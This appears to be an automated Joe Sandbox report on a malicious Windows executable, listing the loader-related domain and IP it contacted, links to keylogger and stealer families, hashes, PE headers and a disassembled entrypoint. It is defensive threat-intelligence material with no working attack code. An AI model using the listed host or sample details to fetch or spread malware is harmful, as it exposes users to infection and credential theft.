              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com/245_AiymwhpjxsgLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedUAHIzSm2x2.exe, 00000000.00000002.3445632764.000000000081B000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2898002791.000000000081B000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000002.3445632764.0000000000809000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com/uUAHIzSm2x2.exe, 00000000.00000003.2956388004.0000000000858000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://amazonenviro.com/245_AiymwhpjxsgCUAHIzSm2x2.exe, 00000000.00000003.3053706651.000000000084A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://amazonenviro.com/245_Aiymwhpjxsgxk6vUAHIzSm2x2.exe, 00000000.00000003.2282231341.000000000082D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://amazonenviro.com/245_Aiymwhpjxsg.muiUAHIzSm2x2.exe, 00000000.00000003.2282231341.000000000080E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com:443/245_AiymwhpjxsgerseUAHIzSm2x2.exe, 00000000.00000003.2897902282.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3114546079.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000002.3445632764.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2956290671.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3053706651.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2760643437.0000000000880000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com/245_AiymwhpjxsgJhUAHIzSm2x2.exe, 00000000.00000003.2282231341.000000000082D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://amazonenviro.com:80/245_AiymwhpjxsggUAHIzSm2x2.exe, 00000000.00000003.3053706651.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2760643437.0000000000880000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com45_AiymwhpjxsgbUAHIzSm2x2.exe, 00000000.00000002.3445632764.000000000084A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://amazonenviro.com/BbeUAHIzSm2x2.exe, 00000000.00000003.2301934670.0000000000858000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://amazonenviro.com/245_Aiymwhpjxsg0UAHIzSm2x2.exe, 00000000.00000003.3053592631.000000000088D000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3114546079.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com/245_AiymwhpjxsgWkUAHIzSm2x2.exe, 00000000.00000003.2301934670.000000000082E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://amazonenviro.com/245_Aiymwhpjxsg1UAHIzSm2x2.exe, 00000000.00000003.2897902282.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://amazonenviro.com:80/245_AiymwhpjxsggcloseUAHIzSm2x2.exe, 00000000.00000003.2897902282.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2956290671.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3053706651.0000000000880000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com/245_Aiymwhpjxsg0UAHIzSm2x2.exe, 00000000.00000003.2301934670.0000000000862000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com/WUAHIzSm2x2.exe, 00000000.00000003.3114546079.0000000000858000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://amazonenviro.com/245_Aiymwhpjxsg5UAHIzSm2x2.exe, 00000000.00000003.2956290671.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://amazonenviro.com/UUAHIzSm2x2.exe, 00000000.00000003.2760643437.0000000000853000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                https://amazonenviro.com/245_AiymwhpjxsgcUAHIzSm2x2.exe, 00000000.00000002.3445632764.0000000000861000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2956290671.0000000000861000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2760643437.0000000000853000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3114546079.000000000085F000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2897902282.000000000085F000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2418848234.000000000085F000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3053706651.0000000000861000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://amazonenviro.com/UAHIzSm2x2.exe, 00000000.00000003.3053706651.0000000000858000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2282231341.000000000082D000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                http://amazonenviro.com:80/245_AiymwhpjxsgUAHIzSm2x2.exe, 00000000.00000003.2760643437.0000000000880000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://amazonenviro.com/245_Aiymwhpjxsg(UAHIzSm2x2.exe, 00000000.00000003.3053592631.000000000088D000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2956290671.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://amazonenviro.com:443/245_Aiymwhpjxsg2UAHIzSm2x2.exe, 00000000.00000003.2897902282.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3114546079.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2956290671.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3053706651.0000000000880000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://amazonenviro.com/245_AiymwhpjxsgXUAHIzSm2x2.exe, 00000000.00000002.3445632764.000000000079E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://amazonenviro.com:80/245_AiymwhpjxsgWUAHIzSm2x2.exe, 00000000.00000003.2760643437.0000000000880000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://amazonenviro.com/UAHIzSm2x2.exe, 00000000.00000003.3053706651.0000000000858000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2282231341.000000000082D000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2956388004.0000000000858000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000002.3445632764.000000000079E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://amazonenviro.com:80/245_Aiymwhpjxsg20FUAHIzSm2x2.exe, 00000000.00000003.2760643437.0000000000880000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://amazonenviro.com:80/245_AiymwhpjxsggTUAHIzSm2x2.exe, 00000000.00000002.3445632764.0000000000880000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://amazonenviro.com:80/245_AiymwhpjxsggedUAHIzSm2x2.exe, 00000000.00000003.3114546079.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000002.3445632764.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2956290671.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3053706651.0000000000880000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://amazonenviro.com/5UAHIzSm2x2.exe, 00000000.00000003.2898002791.0000000000858000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://amazonenviro.com/MUAHIzSm2x2.exe, 00000000.00000003.3114546079.0000000000858000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3053706651.0000000000858000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://amazonenviro.com/UUAHIzSm2x2.exe, 00000000.00000002.3445632764.0000000000853000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://amazonenviro.com/245_AiymwhpjxsgyUAHIzSm2x2.exe, 00000000.00000002.3445632764.00000000007E4000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://amazonenviro.com/245_AiymwhpjxsgpUAHIzSm2x2.exe, 00000000.00000003.3053592631.000000000088D000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3114546079.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  https://amazonenviro.com/245_AiymwhpjxsgxUAHIzSm2x2.exe, 00000000.00000002.3445632764.0000000000861000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2760643437.0000000000853000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3114546079.000000000085F000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    https://amazonenviro.com:443/245_AiymwhpjxsgTUAHIzSm2x2.exe, 00000000.00000003.3114546079.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2956290671.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3053706651.0000000000880000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://amazonenviro.com:443/245_AiymwhpjxsgcloseUAHIzSm2x2.exe, 00000000.00000003.3114546079.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000002.3445632764.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2760643437.0000000000880000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://amazonenviro.com/dUAHIzSm2x2.exe, 00000000.00000003.2898002791.0000000000858000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3114546079.0000000000858000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3053706651.0000000000858000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://amazonenviro.com:443/245_AiymwhpjxsgedUAHIzSm2x2.exe, 00000000.00000003.2897902282.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2760643437.0000000000880000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://amazonenviro.com/245_AiymwhpjxsglUAHIzSm2x2.exe, 00000000.00000003.3114546079.000000000085F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://amazonenviro.com:80/245_Aiymwhpjxsg8UAHIzSm2x2.exe, 00000000.00000003.2897902282.0000000000880000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://amazonenviro.com/245_AiymwhpjxsgtUAHIzSm2x2.exe, 00000000.00000003.3114546079.000000000088D000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2897902282.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://amazonenviro.com:80/245_Aiymwhpjxsgg2UAHIzSm2x2.exe, 00000000.00000002.3445632764.0000000000880000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://amazonenviro.com/245_AiymwhpjxsgkUAHIzSm2x2.exe, 00000000.00000003.3114546079.000000000085F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    166.62.27.188
                    		amazonenviro.comUnited States
                    		26496AS-26496-GO-DADDY-COM-LLCUSfalse

                    General Information

                    Joe Sandbox version:42.0.0 Malachite
                    Analysis ID:1590517
                    Start date and time:2025-01-14 08:23:07 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 5m 7s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:5
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:UAHIzSm2x2.exe
                    renamed because original name is a hash value
                    Original Sample Name:483ab6bd562b28782d0999abec4f57f5.exe
                    Detection:MAL
                    Classification:mal84.troj.evad.winEXE@1/0@1/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 99%
                    • Number of executed functions: 24
                    • Number of non-executed functions: 38
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                    • Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    02:24:06API Interceptor63x Sleep call for process: UAHIzSm2x2.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    166.62.27.188zYj1wg0cM2.docGet hashmaliciousDBatLoaderBrowse
                    • amazonenviro.com/245_Aiymwhpjxsg
                    ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                    • amazonenviro.com/245_Aiymwhpjxsg
                    yxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                    • amazonenviro.com/245_Aiymwhpjxsg
                    ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                    • amazonenviro.com/245_Aiymwhpjxsg

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    amazonenviro.comLbZ88q4uPa.exeGet hashmaliciousDBatLoaderBrowse
                    • 166.62.27.188
                    PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                    • 166.62.27.188
                    zYj1wg0cM2.docGet hashmaliciousDBatLoaderBrowse
                    • 166.62.27.188
                    ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                    • 166.62.27.188
                    yxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                    • 166.62.27.188
                    ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                    • 166.62.27.188
                    PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                    • 166.62.27.188

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    AS-26496-GO-DADDY-COM-LLCUSLbZ88q4uPa.exeGet hashmaliciousDBatLoaderBrowse
                    • 166.62.27.188
                    PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                    • 166.62.27.188
                    trow.exeGet hashmaliciousUnknownBrowse
                    • 107.180.98.101
                    https://upholl-xlognusa.godaddysites.com/Get hashmaliciousUnknownBrowse
                    • 198.71.248.123
                    3.elfGet hashmaliciousUnknownBrowse
                    • 184.168.52.170
                    http://logiinnmaskemettaha93.godaddysites.com/Get hashmaliciousHTMLPhisherBrowse
                    • 198.71.248.123
                    http://app-metamask.godaddysites.com/Get hashmaliciousUnknownBrowse
                    • 198.71.248.123
                    http://metamssk-luggiinn.godaddysites.com/Get hashmaliciousHTMLPhisherBrowse
                    • 198.71.248.123
                    http://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                    • 72.167.84.16
                    n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                    • 166.62.28.135

                    JA3 Fingerprints

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    a0e9f5d64349fb13191bc781f81f42e1LbZ88q4uPa.exeGet hashmaliciousDBatLoaderBrowse
                    • 166.62.27.188
                    PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                    • 166.62.27.188
                    183643586-388657435.07.exeGet hashmaliciousUnknownBrowse
                    • 166.62.27.188
                    uo9m.exeGet hashmaliciousLummaCBrowse
                    • 166.62.27.188
                    uo9m.exeGet hashmaliciousLummaCBrowse
                    • 166.62.27.188
                    YYYY-NNN AUDIT DETAIL REPORT .docxGet hashmaliciousUnknownBrowse
                    • 166.62.27.188
                    msit.exeGet hashmaliciousLummaC StealerBrowse
                    • 166.62.27.188
                    tesr.exeGet hashmaliciousLummaC StealerBrowse
                    • 166.62.27.188

                    Dropped Files

                    No context

                    Created / dropped Files

                    No created / dropped files found

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.188493218292404
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.38%
                    • InstallShield setup (43055/19) 0.43%
                    • Windows Screen Saver (13104/52) 0.13%
                    • Win16/32 Executable Delphi generic (2074/23) 0.02%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    File name:UAHIzSm2x2.exe
                    File size:1'161'216 bytes
                    MD5:483ab6bd562b28782d0999abec4f57f5
                    SHA1:b758556af2b98708b97a6c3bdbd1e9f2905ed690
                    SHA256:e5393c34240b7e1b8a35052d7e151c324a4aa6424b5a6e1a45717157042fb9ab
                    SHA512:6f3f60153b3c4b1a780c80d59a4e17d8c109f57a1380f73b50498ac85a081b804d0f7c0ffade4ac193656b3135dedddcd607121d9571b4c3baf34103e36d129d
                    SSDEEP:24576:Gw6yj+R7ydItm/2uQAGYDKAVcpzWc4ctu:GDBR2KTYDKArc4Ku
                    TLSH:8E359D3790B387FDC17289798F5F9BE4682EA9303928BA52FED17D0D5B242417838197
                    File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                    File Icon

                    Icon Hash:4f858a8c8e8e8946

                    Static PE Info

                    General

                    Entrypoint:0x46e80c
                    Entrypoint Section:.itext
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    DLL Characteristics:
                    Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:44c8864bd68c3bff94639c69671ea4b7

                    Entrypoint Preview

                    Instruction
                    push ebp
                    mov ebp, esp
                    add esp, FFFFFFF0h
                    mov eax, 0046D250h
                    call 00007F131CE33C51h
                    mov ecx, dword ptr [00470E9Ch]
                    mov eax, dword ptr [00470D8Ch]
                    mov eax, dword ptr [eax]
                    mov edx, dword ptr [0046CB00h]
                    call 00007F131CE89AE9h
                    mov eax, dword ptr [00470D8Ch]
                    mov eax, dword ptr [eax]
                    call 00007F131CE89B5Dh
                    call 00007F131CE31AB0h
                    lea eax, dword ptr [eax+00h]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x750000x266e.idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x820000xa1c00.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x7ce8.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x790000x18.rdata
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x757540x600.idata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x6c4c00x6c60069c4173c38ad27686fb46f69fd79ec91False0.5070961288927336data6.531494017298441IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .itext0x6e0000x8480xa00639613140a642faedd01bff468c3e3cfFalse0.523828125data5.552779847613545IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .data0x6f0000x1f400x200053b6dd6978c858db7e9faa57954b9c18False0.3963623046875data3.804120578626792IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .bss0x710000x36ec0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .idata0x750000x266e0x2800f0f9a1156b641e5ea253cb6ddcaf08baFalse0.3103515625data4.872671403071516IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .tls0x780000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rdata0x790000x180x2005b11e123dd9b7f6d94b27d2ad6e9bc83False0.05078125data0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc0x7a0000x7ce80x7e003b0f62de599dc8a77438a9e2115a0b81False0.6107390873015873data6.679791141044884IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    .rsrc0x820000xa1c000xa1c00d31868c6483367700b95815234a2e180False0.50098410935085data6.976886685856244IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                    Resources

                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_CURSOR0x832440x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                    RT_CURSOR0x833780x134dataEnglishUnited States0.4642857142857143
                    RT_CURSOR0x834ac0x134dataEnglishUnited States0.4805194805194805
                    RT_CURSOR0x835e00x134dataEnglishUnited States0.38311688311688313
                    RT_CURSOR0x837140x134dataEnglishUnited States0.36038961038961037
                    RT_CURSOR0x838480x134dataEnglishUnited States0.4090909090909091
                    RT_CURSOR0x8397c0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                    RT_BITMAP0x83ab00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                    RT_BITMAP0x83c800x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                    RT_BITMAP0x83e640x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                    RT_BITMAP0x840340x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                    RT_BITMAP0x842040x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                    RT_BITMAP0x843d40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                    RT_BITMAP0x845a40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                    RT_BITMAP0x847740x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                    RT_BITMAP0x849440x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                    RT_BITMAP0x84b140x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                    RT_BITMAP0x84ce40x81940Device independent bitmap graphic, 971 x 182 x 24, image size 530712EnglishUnited States0.497995297238635
                    RT_BITMAP0x1066240x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States0.39864864864864863
                    RT_BITMAP0x10674c0x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States0.3885135135135135
